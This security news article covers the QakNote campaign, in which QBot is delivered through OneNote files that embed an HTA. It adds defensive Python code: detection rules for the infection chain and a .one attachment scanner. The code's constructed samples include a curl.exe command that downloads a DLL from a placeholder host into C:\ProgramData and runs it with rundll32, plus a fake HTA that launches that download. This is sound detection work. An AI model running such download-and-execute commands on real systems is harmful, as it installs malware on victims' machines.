A new QBot malware campaign dubbed "QakNote" has been observed in the wild since the end of last week. It infects systems with the banking trojan using malicious Microsoft OneNote ".one" attachments. Qbot (also known as QakBot) started out as a banking trojan but has evolved into initial-access malware: once it is on a machine, the operators use it to install additional payloads and to carry out data theft, ransomware deployment, or other operations across the whole network.
Since Microsoft began blocking macros by default in Office documents downloaded from the internet in July 2022, threat actors have had fewer ways to run code on targets' computers. OneNote attachments in phishing emails have since emerged as a replacement for macros. Threat actors can embed nearly any file type, such as LNK or VBS files, in a malicious OneNote document, and the embedded file is executed when the user double-clicks it inside the notebook.
The user still has to be persuaded to click on a specific spot to open the embedded file, which is typically done with a fake "Double Click to View File" button or a similar call to action. Once launched, the embedded attachment can run commands that download and install malware on the local system.
Security researcher Andrew Brandt writes in a recent Sophos analysis that since January 31, 2023, QBot's operators have been testing this new distribution technique, using OneNote files with an embedded HTML Application (HTA file) that downloads the QBot payload. Max Malyutin, a researcher at Cynet, was the first to tweet about this change in QBot's distribution, on January 31, 2023.
A script inside the HTA file uses the legitimate curl.exe program to download a DLL (the Qbot payload) into the C:\ProgramData folder, which is then executed with rundll32.exe. The QBot payload injects itself into the Windows Assistive Technology manager (AtBroker.exe) to hide its presence and evade antivirus products running on the device.
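The execution chain above (HTA script, curl.exe download into C:\ProgramData, rundll32.exe, injection into AtBroker.exe) maps directly onto process telemetry. The following is an added example, not code from Sophos or from this article: Python detection logic run over a handful of constructed Sysmon-style events. The parent/child relationships it keys on (ONENOTE.EXE launching mshta.exe, mshta.exe launching curl.exe) are assumptions about how an embedded HTA is executed, and every path, file name and hostname in the sample events is a placeholder.

```python
import re
from dataclasses import dataclass


@dataclass
class Event:
    """Minimal Sysmon-like record (constructed for this example)."""
    event_id: int            # 1 = process creation, 8 = CreateRemoteThread (Sysmon numbering)
    image: str = ""
    parent_image: str = ""
    command_line: str = ""
    source_image: str = ""   # event 8 only
    target_image: str = ""   # event 8 only


def _name(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


PROGRAMDATA = re.compile(r"c:\\programdata\\", re.IGNORECASE)
SCRIPT_HOSTS = {"mshta.exe", "cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}


def classify(ev: Event) -> list[str]:
    """Return the names of every QakNote-chain rule the event matches."""
    hits = []
    if ev.event_id == 1:
        img, parent, cmd = _name(ev.image), _name(ev.parent_image), ev.command_line
        # hop 1 (assumed): OneNote launches the embedded HTA through a script host
        if parent == "onenote.exe" and img in SCRIPT_HOSTS:
            hits.append("onenote_child_script_host")
        # hop 2: the HTA script uses curl.exe to drop a file into C:\ProgramData
        if img == "curl.exe" and parent == "mshta.exe" and PROGRAMDATA.search(cmd):
            hits.append("mshta_curl_to_programdata")
        # hop 3: rundll32.exe executes a DLL that lives under C:\ProgramData
        if img == "rundll32.exe" and PROGRAMDATA.search(cmd) and re.search(r"\.dll\b", cmd, re.I):
            hits.append("rundll32_dll_from_programdata")
    elif ev.event_id == 8:
        # hop 4: the payload injects into AtBroker.exe (remote thread from another image)
        if _name(ev.target_image) == "atbroker.exe" and _name(ev.source_image) != "atbroker.exe":
            hits.append("remote_thread_into_atbroker")
    return hits


CHAIN_RULES = {
    "onenote_child_script_host",
    "mshta_curl_to_programdata",
    "rundll32_dll_from_programdata",
    "remote_thread_into_atbroker",
}


def scan(events: list[Event]) -> list[tuple[int, str]]:
    """(event index, rule name) for every match across the log."""
    return [(i, rule) for i, ev in enumerate(events) for rule in classify(ev)]


def chain_complete(events: list[Event]) -> bool:
    """True once all four stages of the chain have been seen."""
    return CHAIN_RULES.issubset({rule for _, rule in scan(events)})


# Constructed sample log: four stages of the chain followed by one benign curl.exe run.
SAMPLE_EVENTS = [
    Event(1, image=r"C:\Windows\System32\mshta.exe",
          parent_image=r"C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE",
          command_line=r'mshta.exe "C:\Users\victim\AppData\Local\Temp\Open.hta"'),
    Event(1, image=r"C:\Windows\System32\curl.exe",
          parent_image=r"C:\Windows\System32\mshta.exe",
          command_line=r"curl.exe -o C:\ProgramData\update.dll http://example.invalid/p"),
    Event(1, image=r"C:\Windows\System32\rundll32.exe",
          parent_image=r"C:\Windows\System32\mshta.exe",
          command_line=r"rundll32.exe C:\ProgramData\update.dll,Entry"),
    Event(8, source_image=r"C:\Windows\System32\rundll32.exe",
          target_image=r"C:\Windows\System32\AtBroker.exe"),
    Event(1, image=r"C:\Windows\System32\curl.exe",          # benign: admin download
          parent_image=r"C:\Windows\System32\cmd.exe",
          command_line=r"curl.exe -o C:\Users\admin\Downloads\a.txt https://example.invalid/a.txt"),
]

if __name__ == "__main__":
    for idx, rule in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
    print("full chain observed:", chain_complete(SAMPLE_EVENTS))
```

Each rule is deliberately narrow enough to be low-noise on its own (curl.exe is commonly run from cmd.exe, but rarely from mshta.exe and rarely writing into C:\ProgramData), and `chain_complete` is the high-confidence signal for an incident ticket rather than a single alert.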
According to Sophos, the QBot operators use two different strategies to deliver these HTA files. One is an email containing a link to the malicious .one file. The other, which is harder to spot, is the "thread injection" technique: the operators hijack pre-existing email conversations and send the participants a reply-all message with the malicious OneNote notebook attached.
The threat actors place a fake button in the notebook that claims to download the document from the cloud but, when clicked, launches the embedded HTA attachment instead, which makes these attacks even more convincing to victims. Opening the embedded file may cause OneNote to show the victim a warning dialog about the dangers of executing attachments. To guard against this new attack vector, Sophos advises email administrators to consider blocking all .one file extensions, since they are rarely sent legitimately as attachments.
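Blocking on the .one extension is the advice above; a gateway check that also looks at the file's content catches a renamed attachment and can say what is embedded. The following is an added example, not code from Sophos or this article: a Python check that flags .one attachments by extension and by magic bytes, walks the embedded file objects, and sniffs each one for HTA or executable content. The .one file-type GUID and the FileDataStoreObject layout (16-byte header GUID, 8-byte length, 12 bytes unused/reserved, data, footer GUID) are taken from Microsoft's MS-ONESTORE specification; the sample file is constructed inline and is not a real QakNote document, and the hostname example.invalid is a placeholder.

```python
import struct

# GUIDs from the MS-ONESTORE specification, as they appear little-endian on disk.
ONE_FILE_MAGIC = bytes.fromhex("E4525C7B8CD8A74DAEB15378D02996D3")  # .one guidFileType
FDO_HEADER = bytes.fromhex("E716E3BD65261145A4C48D4D0B7A9EAC")      # FileDataStoreObject guidHeader
FDO_FOOTER = bytes.fromhex("22A7FB71790F0B4ABB13899256426B24")      # FileDataStoreObject guidFooter
FDO_DATA_OFFSET = 36  # guidHeader(16) + cbLength(8) + unused(4) + reserved(8)


def is_onenote_file(data: bytes) -> bool:
    """True when the bytes carry the .one section header, whatever the extension says."""
    return data[:16] == ONE_FILE_MAGIC


def embedded_files(data: bytes) -> list[bytes]:
    """Raw payload of every FileDataStoreObject found in the section."""
    blobs, pos = [], 0
    while (idx := data.find(FDO_HEADER, pos)) != -1:
        (length,) = struct.unpack_from("<Q", data, idx + 16)
        start = idx + FDO_DATA_OFFSET
        blobs.append(data[start:start + length])
        pos = start + length
    return blobs


def sniff(blob: bytes) -> str:
    """Cheap content-type guess: the lure's button is an image, the dropper is an HTA."""
    head = blob[:512].lstrip().lower()
    if head.startswith(b"mz"):
        return "pe"
    if head.startswith(b"\x89png"):
        return "png"
    if head.startswith(b"%pdf"):
        return "pdf"
    if head.startswith(b"<") and (b"<hta:application" in head or b"<script" in head or b"<html" in head):
        return "hta_or_html"
    return "unknown"


EXECUTABLE_KINDS = {"hta_or_html", "pe"}


def assess_attachment(filename: str, data: bytes) -> dict:
    """Gateway decision: block on the .one extension (Sophos' advice), block on the .one
    magic when the extension was changed, and report what the notebook embeds."""
    by_ext = filename.lower().endswith(".one")
    by_magic = is_onenote_file(data)
    kinds = [sniff(b) for b in embedded_files(data)] if by_magic else []
    reasons = []
    if by_ext:
        reasons.append("extension .one")
    if by_magic and not by_ext:
        reasons.append("OneNote magic under a different extension")
    risky = sorted(EXECUTABLE_KINDS.intersection(kinds))
    if risky:
        reasons.append("embedded executable content: " + ", ".join(risky))
    return {"block": by_ext or by_magic, "reasons": reasons, "embedded": kinds}


# --- constructed sample: a .one header, one PNG "button", one HTA mimicking the curl.exe drop.
def _fdo(blob: bytes) -> bytes:
    """Wrap a payload in a FileDataStoreObject (data padded to 8 bytes before the footer)."""
    pad = (-len(blob)) % 8
    return FDO_HEADER + struct.pack("<Q", len(blob)) + bytes(12) + blob + bytes(pad) + FDO_FOOTER


FAKE_PNG = b"\x89PNG\r\n\x1a\n" + bytes(32)
FAKE_HTA = (b'<html><head><hta:application id="x"></head><body><script language="VBScript">\n'
            b"' constructed lure; hostname is a placeholder\n"
            b'CreateObject("WScript.Shell").Run "curl.exe -o C:\\ProgramData\\update.dll http://example.invalid/p"\n'
            b"</script></body></html>")
SAMPLE_ONE = ONE_FILE_MAGIC + bytes(64) + _fdo(FAKE_PNG) + _fdo(FAKE_HTA) + bytes(16)

if __name__ == "__main__":
    print(assess_attachment("invoice.one", SAMPLE_ONE))
    print(assess_attachment("invoice.dat", SAMPLE_ONE))   # renamed, still caught by magic
    print(assess_attachment("report.pdf", b"%PDF-1.7 constructed"))
```

The content sniff is intentionally simple; its job is to put "this notebook embeds an HTA" into the quarantine reason so an analyst can triage quickly, not to replace the blanket block the paragraph above recommends.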